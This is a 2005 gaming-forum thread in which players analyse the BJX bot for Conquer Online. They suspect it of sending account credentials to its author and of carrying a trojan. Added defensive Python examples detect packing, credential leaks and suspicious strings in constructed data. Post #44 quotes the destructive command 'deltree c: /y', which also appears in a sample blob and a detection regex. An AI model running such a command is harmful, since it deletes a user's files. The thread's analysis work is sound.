BJX steal your account

Discussion on BJX steal your account within the Conquer Online 2 forum part of the MMORPGs category.

08/12/2005, 18:19 #31
The best way is to unpack the bot and edit it so it does not send the packets.
CFYE.exe is packed with UPX, but it is modified.
(I confirmed it using PE iDentifier.)
We may need OllyDbg and OllyDump.
I will try it later.
sutte is offline  
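The first step sutte describes, confirming how CFYE.exe is packed before reaching for OllyDbg, can be done without PEiD by reading the section table directly. The block below is an added example, not code from this thread or from the bot: it parses the PE section headers and reports three packer indicators, and it builds two constructed sample images (one with the stock UPX0/UPX1 names, one with those names scrubbed) so that it runs offline. Everything in the sample images is made up for the demonstration; nothing in them is taken from CFYE.exe.

```python
import hashlib
import math
import struct

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(buf: bytes) -> float:
    """Bits of entropy per byte; compressed or encrypted data sits close to 8.0."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(data: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        name, vsize, _va, raw_size, raw_ptr, *_ = struct.unpack_from(SECTION_HDR, data, table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": round(shannon_entropy(raw), 2),
        })
    return sections


def packer_indicators(data: bytes, entropy_threshold: float = 7.0) -> dict:
    """Three independent signs of UPX-style packing.

    Renaming the sections defeats the first check only: the unpacking stub
    still needs a section that is empty on disk but large in memory (where the
    original image is rebuilt) and a high-entropy section holding the payload.
    """
    secs = parse_sections(data)
    return {
        "upx_names": [s["name"] for s in secs if s["name"].upper().startswith("UPX")],
        "empty_on_disk": [s["name"] for s in secs if s["raw_size"] == 0 and s["virtual_size"] > 0],
        "high_entropy": [s["name"] for s in secs if s["entropy"] >= entropy_threshold],
    }


def pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler standing in for a compressed payload."""
    out, h = b"", seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return out[:n]


def build_sample_pe(section_specs) -> bytes:
    """Assemble a minimal PE32 from (name, virtual_size, raw_bytes) tuples.

    Constructed test data only: the headers are just complete enough for the
    parser above; the image is not loadable.
    """
    opt_size = 224
    headers_len = 64 + 4 + 20 + opt_size + 40 * len(section_specs)
    first_raw = (headers_len + 511) & ~511                       # file alignment 0x200
    hdr = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)             # e_lfanew = 64
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0, opt_size, 0x102)
    hdr += struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)     # zeroed optional header
    payload, va = b"", 0x1000
    for name, vsize, raw in section_specs:
        raw_ptr = first_raw + len(payload) if raw else 0
        hdr += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), vsize, va, len(raw), raw_ptr, 0, 0, 0, 0, 0x60000020)
        payload += raw + b"\0" * (-len(raw) % 512)
        va += (vsize + 0xFFF) & ~0xFFF
    return hdr + b"\0" * (first_raw - len(hdr)) + payload


# Stock UPX layout: UPX0 is empty on disk, UPX1 carries the compressed image.
SAMPLE_UPX = build_sample_pe([
    (b"UPX0", 0x6000, b""),
    (b"UPX1", 0x3000, pseudo_random(0x3000)),
    (b".rsrc", 0x1000, b"\0" * 0x800 + b"RSRC" * 64),
])
# Same layout with the section names scrubbed, as a "modified UPX" build would show.
SAMPLE_RENAMED = build_sample_pe([
    (b".text", 0x6000, b""),
    (b".data", 0x3000, pseudo_random(0x3000)),
    (b".rsrc", 0x1000, b"\0" * 0x800 + b"RSRC" * 64),
])

if __name__ == "__main__":
    for label, image in (("stock UPX", SAMPLE_UPX), ("renamed", SAMPLE_RENAMED)):
        print(label, packer_indicators(image))
```

Run it on a real file with `packer_indicators(open(path, "rb").read())`. Renaming UPX0/UPX1 to .text/.data, which is what a "modified UPX" build usually amounts to, defeats a name or signature check of the PEiD kind but not the other two indicators, because the stub still needs an empty-on-disk region to decompress into. After OllyDump has rebuilt the image, the same check should show raw sizes matching virtual sizes and code-section entropy well below 7.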
08/12/2005, 18:24 #32
Quote:
    Originally posted by shinichikudo @ Aug 12 2005, 18:18
    Quote:
        Originally posted by Cryptic @ Aug 12 2005, 18:11
        Quote:
            Originally posted by Matt.dk @ Aug 12 2005, 17:28
            Quote:
                Originally posted by Cryptic @ Aug 12 2005, 16:23
                And nobody thought anything when I discovered an infection.
                Just so you kids know, a keylogger can log ALL system keys, not just the password that you enter. So if it really is a keylogger, anything from homework to private emails to online banking information can be stolen. And let's hope it doesn't replicate itself over networks.

            This has nothing to do with the trojan you discovered. It's built into the bot: every time you log in, your user/pass is sent to a Windows box at this guy's home. It's nothing to do with the trojan you discovered, and it does not infect your computer with any keylogger. It's simply a small thing added to the login of the bot to send a packet to one of this guy's computers, no more than that.

        No, not the virus itself, but the fact that this bot may be suspicious.
        What if, however, he realised that most of us are going to be mining with accounts like MinerMan1 or such, and did put something in to install at a possible later date, when we become familiar and trust this bot with our main accounts?

        Also, to stomp on that other theory, there is NO WAY TQ would ever make a bot like this just for that purpose. For one, look at the quality of the coding done in their actual game.

        This bot was updated for any combination of these reasons:
        Stolen accounts/items
        Stolen personal information (although somewhat doubtful)
        Hook users into potentially paying for this bot in the near future.

        On a totally unrelated note, I think it would be an excellent idea if someone recorded a phone call to this person, even from a payphone.

        Either way, is it possible to disable the login function altogether until something more reliable and trustworthy can either be made or implemented?

        Also, would blocking all incoming and outgoing connections from all EXEs associated with this program remove the packet being sent, or is it too small to block?

    I think it used the login as an excuse for outgoing internet access. When you try to log in, your firewall will say it is trying to connect to the internet. Most people will think it's just sending your username and password to log into the server, but maybe it sends to another guy and the login server at once.
Many people have outdated firewalls then.
Mine would probably say:
CFYE.exe is initiating an outgoing connection.
Set Rules for this application:
Always Allow:
Always Ask and Allow Now:
Always Ask and Block Now:
Always Block:
Conquer.exe is initiating an outgoing connection.
Set Rules for this application:
Always Allow:
Always Ask and Allow Now:
Always Ask and Block Now:
Always Block:

Or something along those lines.
Cryptic is offline  
08/12/2005, 18:26 #33
Quote:
Originally posted by sutte @ Aug 12 2005, 18:19
The best way is to unpack the bot and edit it so it does not send the packets.
CFYE.exe is packed with UPX, but it is modified.
(I confirmed it using PE iDentifier.)
We may need OllyDbg and OllyDump.
I will try it later.
We must also attempt to find why it tested positive for a trojan infection. Perhaps somewhere in the code it is hidden, or packed somewhere with CFYE? I haven't opened the file yet; I do not know. Or maybe something we have not discovered yet:
Maybe the trojan was hooked to the self-extracting WinRAR archive.
If I had a copy of just the EXE, I would put it through the same test. Jotti and Kaspersky work well too for files under 1 MB. Perhaps we can find which file in the archive set off the trojan warning.
Cryptic is offline  
08/12/2005, 18:51 #34
It would be interesting to hear from Peach (The former Seraphicz) as to why this is occurring; as he is apparently an insider to the creator of this bot, but I think he may be much more than just someone in the know.
Note: His personal preview of BJX was shown on an earlier thread in the forums. The same account seen in the screenshot was used on the "official" website of BJX. Suspicious. Maybe since he's such good friends with the creator of BJX, he can shine some light on this grim situation?
Cryptic is offline  
08/12/2005, 19:19 #35
Blocking the UDP packets using a firewall just stops BJX from working properly. If you attempt to just block the IP address that the UDP packets are being sent to, then it will send the packets to another IP address.
BitVector is offline  
08/12/2005, 19:22 #36
Quote:
Originally posted by BitVector@Aug 12 2005, 19:19
Blocking the UDP packets using a firewall just stops BJX from working properly. If you attempt to just block the IP address that the UDP packets are being sent to, then it will send the packets to another IP address.
Yes. When the UDP connections to all of his PCs are blocked, it doesn't attempt to log in to the CO servers, or so I've heard you say. Tricky. He must have expected us to find this.
I'm doubtful this is the only little technique he embedded into this bot; though.
Cryptic is offline  
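BitVector's observation (the bot stops logging in once its UDP traffic is blocked, and moves to a second address when the first one is blocked) is something you can check from a capture rather than take on trust. The block below is an added example, not code from this thread or from BJX: given a list of outbound datagrams, it flags any sent to a host other than the game server whose payload carries the account name or password in the clear, and lists the distinct exfil destinations in the order they were tried. The datagram list, the addresses (TEST-NET documentation ranges), the port numbers, the "BJX\x01" payload framing and the credentials are all constructed for the demonstration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Datagram:
    """One outbound packet as a sniffer would export it (fields kept minimal)."""
    ts: float
    proto: str
    dst_ip: str
    dst_port: int
    payload: bytes


def credential_patterns(username: str, password: str) -> dict:
    """Byte forms a naive bot might emit: raw ASCII and UTF-16LE (Windows wide strings)."""
    patterns = {}
    for label, value in (("user", username), ("pass", password)):
        patterns[f"{label}:ascii"] = value.encode("ascii")
        patterns[f"{label}:utf16"] = value.encode("utf-16-le")
    return patterns


def find_credential_leaks(datagrams, username, password, game_servers):
    """Datagrams to any host outside game_servers whose payload carries the login in clear.

    Only plaintext/UTF-16 copies are detected: an XORed or encrypted copy passes
    this check and has to be found by reading the unpacked binary instead.
    """
    patterns = credential_patterns(username, password)
    leaks = []
    for d in datagrams:
        if d.dst_ip in game_servers:
            continue
        hits = [name for name, pat in patterns.items() if pat in d.payload]
        if hits:
            leaks.append((d, hits))
    return leaks


def exfil_destinations(datagrams, game_servers):
    """Distinct non-game (ip, port, proto) targets in first-seen order.

    A second entry appearing after the first host is firewalled is the fallback
    behaviour described in the thread.
    """
    seen = []
    for d in datagrams:
        key = (d.dst_ip, d.dst_port, d.proto)
        if d.dst_ip not in game_servers and key not in seen:
            seen.append(key)
    return seen


# Constructed capture. Addresses are TEST-NET documentation ranges; the port
# numbers, the "BJX\x01" framing and the credentials are invented for the example.
GAME_SERVERS = {"203.0.113.10"}
USERNAME, PASSWORD = "minerman1", "hunter2"
SAMPLE_CAPTURE = [
    Datagram(0.00, "tcp", "203.0.113.10", 9958, b"\x1c\x00\xa3\x9f\x11\x42\x7d\x00\x55\xe0"),  # game login, encrypted
    Datagram(0.01, "udp", "198.51.100.7", 6000, b"BJX\x01minerman1\x00hunter2\x00"),          # copy to author's box
    Datagram(0.02, "udp", "198.51.100.7", 6000, b"BJX\x02"),                                   # ack/retry
    Datagram(1.50, "udp", "198.51.100.8", 6000,                                                 # fallback after .7 is blocked
             b"BJX\x01" + USERNAME.encode("utf-16-le") + b"\x00\x00" + PASSWORD.encode("utf-16-le")),
    Datagram(2.00, "udp", "203.0.113.10", 9958, b"\x00\x04ping"),
]

if __name__ == "__main__":
    for d, hits in find_credential_leaks(SAMPLE_CAPTURE, USERNAME, PASSWORD, GAME_SERVERS):
        print(f"{d.ts:5.2f} {d.proto} {d.dst_ip}:{d.dst_port} leaks {', '.join(hits)}")
    print("exfil destinations tried:", exfil_destinations(SAMPLE_CAPTURE, GAME_SERVERS))
```

On a real capture, feed it whatever your sniffer exported, with the game login server's address in `game_servers`. Two caveats: it only catches a plaintext or UTF-16 copy of the login, so a bot that obfuscates the fields before sending would pass this check and has to be read in the unpacked binary; and the destination list is exactly why per-IP firewall rules fail here, since blocking the first host just makes the second appear. A rule on the program (CFYE.exe) rather than on an address is the one that holds.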
08/12/2005, 20:03 #37
I'm trying to find that post by the user who reported that he/she found a trojan in the bot, but I can't find it. I believe that a mod deleted all the posts in that thread and stickied it in the Exploits, Bots and Hacks section. Anyone got the trojan name?
Matt.dk is offline  
08/12/2005, 20:16 #38
Quote:
Originally posted by Cryptic
Just as a warning: I scanned the latest 1.1 version of BJX straight from using Jotti's malware scan, and got this:
AntiVir Found nothing
ArcaVir Found Trojan.Bat.Deltree.M
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VBA32 Found nothing
-------------------------------------------------------------
Information on Trojan.Bat.Deltree:
-------------------------------------------------------------
Just a warning. I was really excited about this release also; but I am just being a little cautious now.
shinichikudo is offline  
08/12/2005, 20:34 #39
Hmm, I couldn't find any information on the .M variant of this trojan anywhere. But nearly all its other variants are nukers; there are three core trojan variants. It could be there, logging all accounts in the registry, or perhaps hiding a text file somewhere, or it could be what's responsible for sending and confirming the send of our account information to this guy's home computer back in Hong Kong.
Matt.dk is offline  
08/12/2005, 20:42 #40
Quote:
Originally posted by Matt.dk @ Aug 12 2005, 20:34
Hmm, I couldn't find any information on the .M variant of this trojan anywhere. But nearly all its other variants are nukers; there are three core trojan variants. It could be there, logging all accounts in the registry, or perhaps hiding a text file somewhere, or it could be what's responsible for sending and confirming the send of our account information to this guy's home computer back in Hong Kong.
I found two links on .M, but they were both Asian sites. I assume it might be an Asian variant. Whether it was just a nuker or a full trojan, I'm not sure.
I have a feeling that the trojan is there to get the main accounts that we don't enter into the bot. I would not be surprised if the virus was hooked to the self-extracting archive, as I said before.
Edit: I was able to find this; but it is of little to no help whatsoever.


I am currently trying to translate a page from Korean
Cryptic is offline  
08/12/2005, 20:50 #41
Quote:
    Originally posted by Cryptic @ Aug 12 2005, 20:42
    Quote:
        Originally posted by Matt.dk @ Aug 12 2005, 20:34
        Hmm, I couldn't find any information on the .M variant of this trojan anywhere. But nearly all its other variants are nukers; there are three core trojan variants. It could be there, logging all accounts in the registry, or perhaps hiding a text file somewhere, or it could be what's responsible for sending and confirming the send of our account information to this guy's home computer back in Hong Kong.
    I found two links on .M, but they were both Asian sites. I assume it might be an Asian variant. Whether it was just a nuker or a full trojan, I'm not sure.
    I have a feeling that the trojan is there to get the main accounts that we don't enter into the bot. I would not be surprised if the virus was hooked to the self-extracting archive, as I said before.
If that were true, then all of our systems would be infected with this trojan. Regardless of what it does, we would all likely be infected, seeing as very few antiviruses pick up this, as you said, most likely Asian variant of Trojan.Bat.Deltree.

The thing is, if it was a nuker, we would have known that by now. I think we can throw that question out the window of Windows, so to speak.

Anyway, I booted up my copy of ArcaVir, which I happen to have one of the recent releases of. I installed and updated it, ran a scan, and it found Trojan.Bat.Deltree.M, but only within the bot's exe. It was not in the rar file that I obtained from a friend, nor was it found within the self-extracting version of 1.1 that can be downloaded from the official website of the bot. Well, at least ArcaVir didn't find it in the self-extractor, but it could be there, hooked and ready to take action and work in sync with the trojan inside the bot itself, perhaps as its second half.
Matt.dk is offline  
08/12/2005, 20:57 #42
Quote:
    Originally posted by Matt.dk @ Aug 12 2005, 20:50
    Quote:
        Originally posted by Cryptic @ Aug 12 2005, 20:42
        Quote:
            Originally posted by Matt.dk @ Aug 12 2005, 20:34
            Hmm, I couldn't find any information on the .M variant of this trojan anywhere. But nearly all its other variants are nukers; there are three core trojan variants. It could be there, logging all accounts in the registry, or perhaps hiding a text file somewhere, or it could be what's responsible for sending and confirming the send of our account information to this guy's home computer back in Hong Kong.

        I found two links on .M, but they were both Asian sites. I assume it might be an Asian variant. Whether it was just a nuker or a full trojan, I'm not sure.
        I have a feeling that the trojan is there to get the main accounts that we don't enter into the bot. I would not be surprised if the virus was hooked to the self-extracting archive, as I said before.
    If that were true, then all of our systems would be infected with this trojan. Regardless of what it does, we would all likely be infected, seeing as very few antiviruses pick up this, as you said, most likely Asian variant of Trojan.Bat.Deltree.

    The thing is, if it was a nuker, we would have known that by now. I think we can throw that question out the window of Windows, so to speak.

    Anyway, I booted up my copy of ArcaVir, which I happen to have one of the recent releases of. I installed and updated it, ran a scan, and it found Trojan.Bat.Deltree.M, but only within the bot's exe. It was not in the rar file that I obtained from a friend, nor was it found within the self-extracting version of 1.1 that can be downloaded from the official website of the bot. Well, at least ArcaVir didn't find it in the self-extractor, but it could be there, hooked and ready to take action and work in sync with the trojan inside the bot itself, perhaps as its second half.
I have not executed the archive, and thus anything inside it. So I would sincerely doubt that I would be infected.
Anyway, the English site, I think, is just a list.
The Korean site took a while to figure out, but I think it's just patch history or something of that sort. I managed to find a mention of Trojan.Bat.Deltree.M, but it was a simple text box and nothing more. We will probably need to unpack it before we can go any further. Reading the source code of that one Korean page turned up nothing; I didn't find anything that may assist.
Edit: I just realized that Google was parsing my results. Give me a bit to look around. Perhaps other search engines might come up with more progressive results.
Cryptic is offline  
08/12/2005, 21:09 #43
He's spreading this program to as many as he can; he will probably release 1 or 2 more free ones, then make it so you must pay for the bot :P. I think he's more into the money (like he was before).
Pindle is offline  
08/12/2005, 21:24 #44
Search results:
I cannot be certain, but I am almost sure that this is the root English version of Trojan.BAT.Deltree (edits Autoexec.bat):
Taken from:
Quote:

Deltree Trojan usually replaces the contents of the Autoexec.bat file with this line:

deltree c: /y

If the Autoexec.bat file is run, which automatically happens each time you start a Windows 95/98/Me computer, the command deletes all the files on the C drive.
However, conflicting information lower on the page states that 95/98/Me are not the only OSes affected.
Quote:
Systems Affected: Windows 3.x, Windows 95, Windows 98, Windows NT, Windows 2000, Windows XP, Windows Me
I personally think that this is just a template for Windows, and perhaps only 95/98/Me are affected. That would mean XP/2000/NT users are exempt from the possible immediate nuking.

Now, a possible coincidence? Or something else:
Taken from:
Quote:

Conquer FengYun Patch is now formally released. This patch only provides simple leveling and mining functions. We will not supply any destructive functions that could alter the game's equilibrium. No duping items. (PS: does not support Windows 98)
Perhaps a little glitch in the version of this trojan? Or perhaps a version which works only with NT/2000/XP?

Kaspersky shows empty entries, but this is listed under Trojan.BAT.DeltreeY.m:
Quote:
Trojan.BAT.DeltreeY.m (Kaspersky Lab) is also known as: Bat/poin (McAfee), Bat.Deltree.Trojan (Symantec), Troj/Batdt43-A (Sophos), BAT/DelTree.G* (RAV), BAT_DELTREE.E (Trend Micro), BAT/Deltree.E (H+BEDV), BAT/DelAll@troj (FRISK), BV:Qz (ALWIL), BAT.DelTree.G (SOFTWIN), Trojan.Bat.DeltreeY.M (ClamAV), BAT/Deltree.G (Panda), BAT/DelTree.E (Eset)
Whatever the case, at least now we have a fairly likely-correct translation of the names of viruses on different products.
Cryptic is offline  
08/12/2005, 21:25 #45
I am looking at the function that connects to the BJX server, and one return error message of it says "The balance of game card is equal to zero, refill your game card please" so I guess he will be charging fees for usage later.

The Login/Password will probably later work as some kind of identification of your game card, though it can be abused too.

Cryptic:
Must be a false detection, I can't find any .bat changing code in the .exe.
chocoman4k is offline  
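Two things in this thread come down to what strings the binary contains: the deltree line that a BAT.Deltree signature of the kind Cryptic quotes in #44 looks for, and the "game card" error text chocoman4k read out of the server-connect routine in #45. The block below is an added example, not code from this thread or from BJX: a small strings extractor for ASCII and UTF-16LE text with a few indicator patterns, run over two constructed blobs, one that mimics what chocoman4k describes and one that carries an actual deltree line so a real hit is visible. Both blobs, including the address embedded in the first, are made up for the demonstration; nothing is taken from CFYE.exe.

```python
import re

PRINTABLE = rb"[\x20-\x7e]"


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return (offset, encoding, text) for ASCII and UTF-16LE runs of min_len+ chars."""
    found = []
    for m in re.finditer(PRINTABLE + rb"{%d,}" % min_len, data):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in re.finditer(rb"(?:" + PRINTABLE + rb"\x00){%d,}" % min_len, data):
        found.append((m.start(), "utf16", m.group().decode("utf-16-le")))
    return sorted(found)


# Indicator patterns applied to each extracted string.
INDICATORS = {
    "deltree":  re.compile(r"deltree\s+[a-z]:\s*/y", re.I),          # BAT.Deltree family payload line
    "autoexec": re.compile(r"autoexec\.bat", re.I),                  # the file that family overwrites
    "billing":  re.compile(r"game card", re.I),                      # pay-to-use hint chocoman4k saw
    "endpoint": re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?\b"),  # hard-coded IP[:port]
}


def triage(data: bytes) -> dict:
    """Map each indicator name to the (offset, encoding, text) strings that match it."""
    hits = {name: [] for name in INDICATORS}
    for entry in extract_strings(data):
        for name, pattern in INDICATORS.items():
            if pattern.search(entry[2]):
                hits[name].append(entry)
    return hits


# Constructed blobs. FILLER is all non-printable bytes, so only the embedded text is extracted.
FILLER = bytes(range(0x80, 0x100)) * 4
BOT_LIKE = (
    FILLER
    + b"The balance of game card is equal to zero, refill your game card please\x00"
    + FILLER
    + "BJX server 198.51.100.7:6000".encode("utf-16-le") + b"\x00\x00"   # invented endpoint string
    + FILLER
)
DELTREE_LIKE = FILLER + b"@echo off\r\ndeltree c: /y\r\n" + FILLER       # what a genuine hit looks like

if __name__ == "__main__":
    for label, blob in (("bot-like", BOT_LIKE), ("deltree-like", DELTREE_LIKE)):
        print(label)
        for name, matches in triage(blob).items():
            for off, enc, text in matches:
                print(f"  {name:9s} @0x{off:04x} ({enc}) {text}")
```

Run it on the image after OllyDump, not on the packed file: a packed section hides its strings, and packer stubs themselves trip generic AV signatures often enough that a single-engine hit on Jotti is weak evidence on its own. The point chocoman4k makes follows from the output: a BAT.Deltree detection on a binary with no "deltree" or "autoexec" string and no code that writes a .bat file is a signature collision, not a payload, while an endpoint string in the connect routine is the thing actually worth chasing.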